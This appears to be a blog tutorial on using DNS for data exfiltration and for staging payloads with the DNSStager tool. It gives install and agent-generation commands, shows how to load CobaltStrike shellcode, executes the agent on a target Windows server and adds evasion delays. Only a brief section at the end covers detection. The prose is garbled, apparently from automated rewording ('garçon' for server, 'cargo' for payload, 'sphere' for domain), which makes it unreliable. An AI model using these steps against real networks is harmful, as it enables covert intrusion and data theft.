Tutorial: How to exfiltrate or execute files in compromised machines with DNS Complete Guide by Blackhat Pakistan 2023
Today we will learn about How to exfiltrate or execute files in compromised machines with DNS
Culprits are constantly changing their modus operandi and using different strategies and ways to compromise their targets and exfiltrate data from the internal networks, indeed in the most delicate situations. For illustration, TCP business is blocked by dereliction in a network, and the communication between a vicious agent installed on a specific target with its C2 garçon isn’t possible. In those kinds of scripts, using other network protocols like ICPM and DNS could be the perfect vehicle to negotiate the hard task of transferring internal information over the walls.
What is DNS protocol
The DNS protocol is decreasingly being used as a pathway for data exfiltration, indeed by infected bias preliminarily infected by trouble interposers during its vicious conditioning. DNS tunneling involves transferring the network business via DNS harborage 53, which is frequently audited and flagged by network firewalls, indeed coming- generation bones
.
vicious software can use especially drafted requests to take advantage of the DNS protocol and shoot only well- defined gobbets in the middle of a implicit licit DNS business. Figure 1 below shows how the introductory data about a target machine could be transferred between the internal agent and its C2 garçon available on the internet.( CLICK IMAGES TO ENLARGE)

As presented over, the sensitive data can be added at the middle of a request, in raw formate( 1 and 2), or indeed using a hexadecimal encoder( 3), the stylish way to avoid implicit not accepted skivvies
.
In general, the vary of data stolen by culprits may include
- face-to-face identifiable information( PII) similar as introductory details, credit card, social security figures and so on.
- Regulated data related to Payment Industry Data Security Standard( PCI DSS) and Health Insurance Portability and Responsibility Act( HIPAA) compliance.
- Intellectual property gives an association or culprits a competitive advantage.
- Other sensitive information includes nonpublic information, documents, contracts, company financials, payroll information, emails and every critical secret.
Data encryption malware is an excellent system to introduce the subject. As the system used by culprits during the ransomware has changed, now they’re using the stolen data to put the victims on alert, publishing the secrets on dark web forums to force the victims to pay the rescue. culprits exfiltrate the data before cracking all the data.
still, the exfiltration of data from internal networks is frequently seen as a big challenge, as security products block TCP business. At this point, DNS protocol can be abused to communicate with the Internet when TCP gregarious business isn’t possible by dereliction.
Also Read:Contemporary UEFI Bootkits by Blackhat Pakistan 2023
Tutorial DNSStager
DNSStager is an open- source tool used to hide a vicious cargo over DNS, recoup it via multiple DNS records similar as IPv6 and TXT, and fit the full cargo into memory. rather of only carrying data from the internal network, we can produce a strong connection like a C2 garçon to execute 2nd stage loads on the target machine.
In short, DNSStager creates a mischief DNS garçon that resolves fake requests to AAAA and TXT records. These requests are a knob of the cargo( completely decoded and translated) and ready to be used by the DNSStager agent. This tool can induce C or GoLand agents, a configuration defined before starting the laboratory.
Figure 2 shows how DNSStager works and how the garçon resolves a request.

In detail, the “client.exe ” train illustrated in Figure 2 over is the DNSStager agent created and dropped on the target machine. DNSStarger encodes the vicious cargo, resolve it into gobbets, and makes it ready to resolve via the “client.exe ” agent C or GoLand depending on the nature of the asked script).
After entering all the information via DNS protocol and avoiding network walls, the agent will fit the final cargo into the memory and execute the shellcode that implements process/ memory injection ways.
To start this trip, we’re furnishing below the essential way to conduct this laboratory with success.
1. DNSStager installation and execution
To install DNSStager, it’s necessary to clone it first from the official repository using the following command, install it, and execute it.
git clone https://github.com/mhaskar/DNSStagerpip3 install -r requirements.txt apt install mingw-w64 ./dnsstager.py |

2. Configuring the DNS server
The first step is pointing the sphere to the DNSStager IP address to resolve and handle any DNS request rightly.
For illustration, controlling a sphere called “mydnsserver.live ”, we can produce a subdomain called “test.mydnsserver.live ” and mademydnsserver.live the “ NS ” – Name Garçon oftest.mydnsserver.live after running DNSStager onmydnsserver.live.

As observed in Figure 4, any request coming to the domain test.mydnsserver.live will be handled by mydnsserver.live, which is the DNSStager instance that we are running.
3. DNSStager options
DNSStarger is equipped with a lot of functionalities.

The “- sphere ” option is used to elect the primary sphere used to handle the DNS requests, in this case, “test.mydnsserver.live ”. also, as a way of bypassing firewalls, the “- prefix ” option can be used to add a prefix as “ cdn ”. Some exemplifications are presented below.
cdn0.test.mydnsserver.live
cdn1.test.mydnsserver.live
cdnN.test.mydnsserver.live
The other options are described below
- – cargo the DNSStager cargo “ agent ” generated.
- – affair Affair path to save DNSStager executable cargo “ agent. ”
- –shellcode_path The raw/ caddy shellcode path.
- – xorkey XOR key to render the cargo with.
- – sleep Used to sleep for N seconds between each DNS request.
In addition, the available loads can be vindicated by using the flag “ – loads ”

4. Generate the payload/agent
DNSStager cipher the cargo using XOR encoder/ encrypter. The XOR key can be specified by using the command “ – xorkey ”.
The complete command can be observed then
sudo ./dnsstager.py –domain test.mydnsserver.live –payload x64/c/ipv6 –output /tmp/a2.exe –prefix cloud-srv- –shellcode_path ~/payload.bin –sleep 1 –xorkey 0x10

In addition, a sleep time between each request can be added using the option “ – sleep ” – a way of escaping discovery.
5. DNSStager with CobaltStrike beacons
The shellcode used in this script can be a CobaltStrike lamp to take advantage of the panoply of features handed by this red teaming suite.
also, rather of using the available DNSStager loads, we can produce the CobaltStrike cargo as demonstrated in Figure 8.

So, from this point, we need to produce the agent using the same command handed over, but this time indicating the path of the generated cargo via CobaltStrike.
6. Executing the agent
At this moment, we can execute the agent on the target machine, in this case, a Windows Garçon 2019.

After executing the agent with the CobaltStrike lamp outside, we can see the DNS business generated between the target machine and the DNSStager garçon. In detail, a aggregate of 59 DNS AAAA requests were transferred to produce the final cargo. From the security point of view, we can also add some sleep between each request to make this kind of exertion less noisy.

DNS protocol and how criminals use it
DNS protocol reveals a potent way abused by culprits in grueling scripts because it can break walls when no TCP business is allowed by dereliction. In this sense, DNS tunneling can be used in a customized way like a C2 structure to perform vicious conditioning.
DNS protocol is a good choice for data exfiltration scripts and cargo prosecution. According to CheckPoint, some pointers should be taken into account to descry DNS tunneling, videlicet.
- Monitoring sphere requests the requests participated during vicious scripts are decoded with a request name likeDATA_HERE.baddomain.com. So, the examination and monitoring between licit and bad business is a good way of precluding scripts of this nature.
- operation of unusual disciplines DNS tunneling works grounded on DNS names. So, if a high volume of requests is observed to an uncommon sphere name, that gesteshould produce an alert.
- High DNS business volume A shaft in DNS business can be an accurate index of DNS tunneling. Because each DNS request has a maximum size of 253 skivvies
- , transferring a large cargo over DNS needs numerous DNS requests performing in abnormal geste..
And last but not least, covering all the network business similar as TCP, DNS, ICMP or indeed the most fantastic protocols can give you a real chance of detecting these kinds of exploitations beforehand. So, let’s take this subject seriously.
Sources [How to exfiltrate or execute files]
- DNSStager, GitHub
- DNS exfiltration, Akamai
- Data exfiltration and DNS, Infoblox
- DNS tunneling, CheckPoint